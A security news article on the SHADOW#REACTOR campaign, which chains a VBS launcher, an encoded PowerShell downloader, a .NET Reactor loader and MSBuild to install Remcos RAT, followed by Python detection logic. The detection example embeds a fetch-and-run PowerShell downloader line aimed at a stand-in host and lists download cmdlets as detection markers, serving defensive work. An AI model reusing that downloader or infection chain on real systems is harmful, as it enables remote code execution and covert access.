New SHADOW#REACTOR malware campaign delivering Remcos RAT

A new malware campaign, dubbed ‘SHADOW#REACTOR,’ uses a multi-stage infection chain to deploy the commercially available Remcos remote administration tool (RAT) and establish persistent access to compromised systems.

According to researchers at Securonix, the attack begins with an obfuscated Visual Basic Script (VBS) launcher executed via wscript.exe. The script triggers a Base64-encoded PowerShell downloader, which retrieves fragmented, text-based payloads from a remote server.

The fragments are later reconstructed and decoded in memory by a .NET Reactor–protected loader. The final stage uses the legitimate MSBuild.exe as a living-off-the-land binary (LOLBin) to complete execution. Then the Remcos RAT backdoor is fully deployed and takes control of the compromised system.
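The two links of this chain that are visible in endpoint telemetry are a script host (wscript.exe) spawning an encoded PowerShell downloader, and MSBuild.exe being launched by something other than a build tool. The detection logic below, an added example that is not part of the Securonix report or this article, runs those two checks over constructed Sysmon-style process-creation events; the field names, file paths, and the allowlist of legitimate MSBuild parents are assumptions.

```python
import base64
import re
# Constructed Sysmon-style process-creation events (not real telemetry); event 2 carries
# the Base64/UTF-16LE encoded command that PowerShell's -enc switch expects.
_DOWNLOADER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p1.txt')"
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\invoice.vbs"'},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc "
                + base64.b64encode(_DOWNLOADER.encode("utf-16-le")).decode("ascii")},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\stage.proj"},
    {"parent": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe app.csproj"},  # benign developer build, must not alert
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe"}  # assumed allowlist of parents
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient", "iex")
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    # Decoded -EncodedCommand payload, or None if the switch is absent or undecodable.
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def _name(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    # Suspicious traits of one process-creation event, matched on parent/child pairs.
    parent, image = _name(event["parent"]), _name(event["image"])
    findings = []
    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        findings.append("script host spawned powershell")
        decoded = decode_encoded_command(event["cmdline"])
        if decoded and any(k in decoded.lower() for k in DOWNLOAD_MARKERS):
            findings.append("encoded powershell downloader")
    if image == "msbuild.exe" and parent not in BUILD_PARENTS:
        findings.append("msbuild launched by non-build-tool parent")
    return findings
```

Decoding the encoded command before matching matters here: the download cmdlets never appear in clear text on the command line, so a plain string match on the raw event would miss the second stage.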

“In this campaign, Remcos is delivered through an unusual text-only staging pipeline, protected by .NET Reactor and reflective loading techniques. This approach significantly complicates static detection and sandbox analysis while still providing attackers with persistent, covert remote access,” the report notes.

The campaign appears to be opportunistic, mainly targeting enterprise and small-to-medium business environments. While the tactics and techniques observed in the campaign resemble the methods commonly associated with initial access brokers (IABs), there is no evidence pointing to a particular threat actor.

“At present, there is insufficient evidence to attribute this activity to a known threat group or nation-state actor. The infrastructure is transient, and no distinctive code overlaps or operational markers have been identified. SHADOW#REACTOR is therefore best assessed as an unattributed, financially motivated loader framework designed to deliver Remcos RAT at scale while evading detection through in-memory execution and LOLBin abuse,” the report concludes.